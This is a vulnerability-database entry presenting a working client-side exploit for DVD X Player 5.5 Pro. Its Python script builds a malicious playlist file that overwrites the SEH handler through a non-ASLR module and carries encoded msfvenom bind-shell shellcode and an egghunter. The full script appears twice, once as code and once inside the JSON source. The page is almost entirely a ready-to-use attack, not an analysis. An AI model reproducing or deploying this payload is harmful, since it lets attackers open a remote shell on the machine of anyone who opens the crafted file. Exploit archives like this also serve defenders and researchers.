Search...

DVD-X-Player-5.5-Pro-SEH

2015-01-05T16:37:25

ID EXPLOITPACK:0C2030C09EAA8FE2630D0602FA60AE59
Type exploitpack
Reporter blake
Modified 2015-01-05T16:37:25

Description

DVD X Player 5.5 Pro

Bypass ASLR by using non-aslr enabled module

SEH Overwrite

Egghunter is not needed as there is at least 2000 bytes for shellcode

                                        
                                            import sys
 
print "===================================="
print "DVD X Player 5.5 Pro Buffer Overflow"
print "    SEH Overwrite - Bypass ASLR     "
print "         Written by Blake           "
print "===================================="
 
# size = 325 bytes
# ./msfvenom -p windows/shell/bind_tcp LPORT=8080 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x1a' -f c
shellcode=(
"\xba\x16\x44\x8a\xd1\xdb\xd1\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x4b\x31\x55\x14\x83\xc5\x04\x03\x55\x10\xf4\xb1\x76\x39\x71"
"\x39\x87\xba\xe1\xb3\x62\x8b\x33\xa7\xe7\xbe\x83\xa3\xaa\x32"
"\x68\xe1\x5e\xc0\x1c\x2e\x50\x61\xaa\x08\x5f\x72\x1b\x95\x33"
"\xb0\x3a\x69\x4e\xe5\x9c\x50\x81\xf8\xdd\x95\xfc\xf3\x8f\x4e"
"\x8a\xa6\x3f\xfa\xce\x7a\x3e\x2c\x45\xc2\x38\x49\x9a\xb7\xf2"
"\x50\xcb\x68\x89\x1b\xf3\x03\xd5\xbb\x02\xc7\x06\x87\x4d\x6c"
"\xfc\x73\x4c\xa4\xcd\x7c\x7e\x88\x81\x42\x4e\x05\xd8\x83\x69"
"\xf6\xaf\xff\x89\x8b\xb7\x3b\xf3\x57\x32\xde\x53\x13\xe4\x3a"
"\x65\xf0\x72\xc8\x69\xbd\xf1\x96\x6d\x40\xd6\xac\x8a\xc9\xd9"
"\x62\x1b\x89\xfd\xa6\x47\x49\x9c\xff\x2d\x3c\xa1\xe0\x8a\xe1"
"\x07\x6a\x38\xf5\x31\x31\x55\x3a\x0f\xca\xa5\x54\x18\xb9\x97"
"\xfb\xb2\x55\x94\x74\x1c\xa1\xdb\xae\xd8\x3d\x22\x51\x18\x17"
"\xe1\x05\x48\x0f\xc0\x25\x03\xcf\xed\xf3\x83\x9f\x41\xac\x63"
"\x70\x22\x1c\x0b\x9a\xad\x43\x2b\xa5\x67\xec\x9a\x81\xdb\x7b"
"\xde\x35\xc3\xeb\x57\xd3\x91\x1b\x31\x4b\x0e\xde\x66\x44\xa9"
"\x21\x4d\xf8\x62\xb6\xda\x16\xb4\xb9\xdb\x3c\x96\x16\x74\xd7"
"\x6d\x75\x41\xc6\x71\x50\xe2\x9f\xe6\x2e\x62\xed\x97\x2f\xaf"
"\x87\x57\xba\x4b\x0e\x0f\x52\x51\x77\x67\xfd\xaa\x52\xf3\x34"
"\x3e\x1d\x6c\x39\xae\x9d\x6c\x6f\xa4\x9d\x04\xd7\x9c\xcd\x31"
"\x18\x09\x62\xea\x8d\xb1\xd3\x5e\x05\xd9\xd9\xb9\x61\x46\x21"
"\xec\x73\xbb\xf4\xc9\xf1\xcd\x72\x3a\x3a")
 
# 32 byte egghunter
egghunter =(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
"\x54\x30\x30\x57" # egg - W00T
"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
 
 
# overwrite EIP = 260 bytes
# overwrite SEH = 616 bytes - 0x61602adb pop edi; pop esi; ret [EPG.dll]
 
egg = "\x54\x30\x30\x57\x54\x30\x30\x57"
buffer = "\x41" * 608
next_seh = "\xeb\x06\x90\x90"   # jump forward 6 bytes
seh = "\xdb\x2a\x60\x61"    # pop/pop/ret
nops = "\x90" * 20
 
print "[+] Creating malicious plf"
try:
    file = open("owned.plf","w")
    file.write(buffer + next_seh + seh + nops + egghunter + nops + egg + shellcode)
    file.close()
    print "[+] File created successfully"
    raw_input("[+] Press any key to exit")
except:
    print "[X] Error creating file!"
    sys.exit(0)

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:11", "references": [], "description": "\n# DVD X Player 5.5 Pro\n# Bypass ASLR by using non-aslr enabled module\n# SEH Overwrite\n# Egghunter is not needed as there is at least 2000 bytes for shellcode", "edition": 1, "reporter": "blake", "exploitpack": {"type": "clientside", "platform": "windows"}, "published": "2015-01-05T16:37:25", "title": "DVD-X-Player-5.5-Pro-SEH", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:11", "rev": 2}, "score": {"value": -0.1, "vector": "NONE", "modified": "2020-04-01T19:04:11", "rev": 2}, "vulnersScore": -0.1}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2015-01-05T16:37:25", "id": "EXPLOITPACK:0C2030C09EAA8FE2630D0602FA60AE59", "href": "", "viewCount": 1, "sourceData": "import sys\n \nprint \"====================================\"\nprint \"DVD X Player 5.5 Pro Buffer Overflow\"\nprint \" SEH Overwrite - Bypass ASLR \"\nprint \" Written by Blake \"\nprint \"====================================\"\n \n# size = 325 bytes\n# ./msfvenom -p windows/shell/bind_tcp LPORT=8080 -e x86/shikata_ga_nai -b '\\x00\\x0a\\x0d\\x1a' -f c\nshellcode=(\n\"\\xba\\x16\\x44\\x8a\\xd1\\xdb\\xd1\\xd9\\x74\\x24\\xf4\\x5d\\x29\\xc9\\xb1\"\n\"\\x4b\\x31\\x55\\x14\\x83\\xc5\\x04\\x03\\x55\\x10\\xf4\\xb1\\x76\\x39\\x71\"\n\"\\x39\\x87\\xba\\xe1\\xb3\\x62\\x8b\\x33\\xa7\\xe7\\xbe\\x83\\xa3\\xaa\\x32\"\n\"\\x68\\xe1\\x5e\\xc0\\x1c\\x2e\\x50\\x61\\xaa\\x08\\x5f\\x72\\x1b\\x95\\x33\"\n\"\\xb0\\x3a\\x69\\x4e\\xe5\\x9c\\x50\\x81\\xf8\\xdd\\x95\\xfc\\xf3\\x8f\\x4e\"\n\"\\x8a\\xa6\\x3f\\xfa\\xce\\x7a\\x3e\\x2c\\x45\\xc2\\x38\\x49\\x9a\\xb7\\xf2\"\n\"\\x50\\xcb\\x68\\x89\\x1b\\xf3\\x03\\xd5\\xbb\\x02\\xc7\\x06\\x87\\x4d\\x6c\"\n\"\\xfc\\x73\\x4c\\xa4\\xcd\\x7c\\x7e\\x88\\x81\\x42\\x4e\\x05\\xd8\\x83\\x69\"\n\"\\xf6\\xaf\\xff\\x89\\x8b\\xb7\\x3b\\xf3\\x57\\x32\\xde\\x53\\x13\\xe4\\x3a\"\n\"\\x65\\xf0\\x72\\xc8\\x69\\xbd\\xf1\\x96\\x6d\\x40\\xd6\\xac\\x8a\\xc9\\xd9\"\n\"\\x62\\x1b\\x89\\xfd\\xa6\\x47\\x49\\x9c\\xff\\x2d\\x3c\\xa1\\xe0\\x8a\\xe1\"\n\"\\x07\\x6a\\x38\\xf5\\x31\\x31\\x55\\x3a\\x0f\\xca\\xa5\\x54\\x18\\xb9\\x97\"\n\"\\xfb\\xb2\\x55\\x94\\x74\\x1c\\xa1\\xdb\\xae\\xd8\\x3d\\x22\\x51\\x18\\x17\"\n\"\\xe1\\x05\\x48\\x0f\\xc0\\x25\\x03\\xcf\\xed\\xf3\\x83\\x9f\\x41\\xac\\x63\"\n\"\\x70\\x22\\x1c\\x0b\\x9a\\xad\\x43\\x2b\\xa5\\x67\\xec\\x9a\\x81\\xdb\\x7b\"\n\"\\xde\\x35\\xc3\\xeb\\x57\\xd3\\x91\\x1b\\x31\\x4b\\x0e\\xde\\x66\\x44\\xa9\"\n\"\\x21\\x4d\\xf8\\x62\\xb6\\xda\\x16\\xb4\\xb9\\xdb\\x3c\\x96\\x16\\x74\\xd7\"\n\"\\x6d\\x75\\x41\\xc6\\x71\\x50\\xe2\\x9f\\xe6\\x2e\\x62\\xed\\x97\\x2f\\xaf\"\n\"\\x87\\x57\\xba\\x4b\\x0e\\x0f\\x52\\x51\\x77\\x67\\xfd\\xaa\\x52\\xf3\\x34\"\n\"\\x3e\\x1d\\x6c\\x39\\xae\\x9d\\x6c\\x6f\\xa4\\x9d\\x04\\xd7\\x9c\\xcd\\x31\"\n\"\\x18\\x09\\x62\\xea\\x8d\\xb1\\xd3\\x5e\\x05\\xd9\\xd9\\xb9\\x61\\x46\\x21\"\n\"\\xec\\x73\\xbb\\xf4\\xc9\\xf1\\xcd\\x72\\x3a\\x3a\")\n \n# 32 byte egghunter\negghunter =(\n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8\"\n\"\\x54\\x30\\x30\\x57\" # egg - W00T\n\"\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\")\n \n \n# overwrite EIP = 260 bytes\n# overwrite SEH = 616 bytes - 0x61602adb pop edi; pop esi; ret [EPG.dll]\n \negg = \"\\x54\\x30\\x30\\x57\\x54\\x30\\x30\\x57\"\nbuffer = \"\\x41\" * 608\nnext_seh = \"\\xeb\\x06\\x90\\x90\" # jump forward 6 bytes\nseh = \"\\xdb\\x2a\\x60\\x61\" # pop/pop/ret\nnops = \"\\x90\" * 20\n \nprint \"[+] Creating malicious plf\"\ntry:\n file = open(\"owned.plf\",\"w\")\n file.write(buffer + next_seh + seh + nops + egghunter + nops + egg + shellcode)\n file.close()\n print \"[+] File created successfully\"\n raw_input(\"[+] Press any key to exit\")\nexcept:\n print \"[X] Error creating file!\"\n sys.exit(0)", "cvss": {"score": 0.0, "vector": "NONE"}, "immutableFields": []}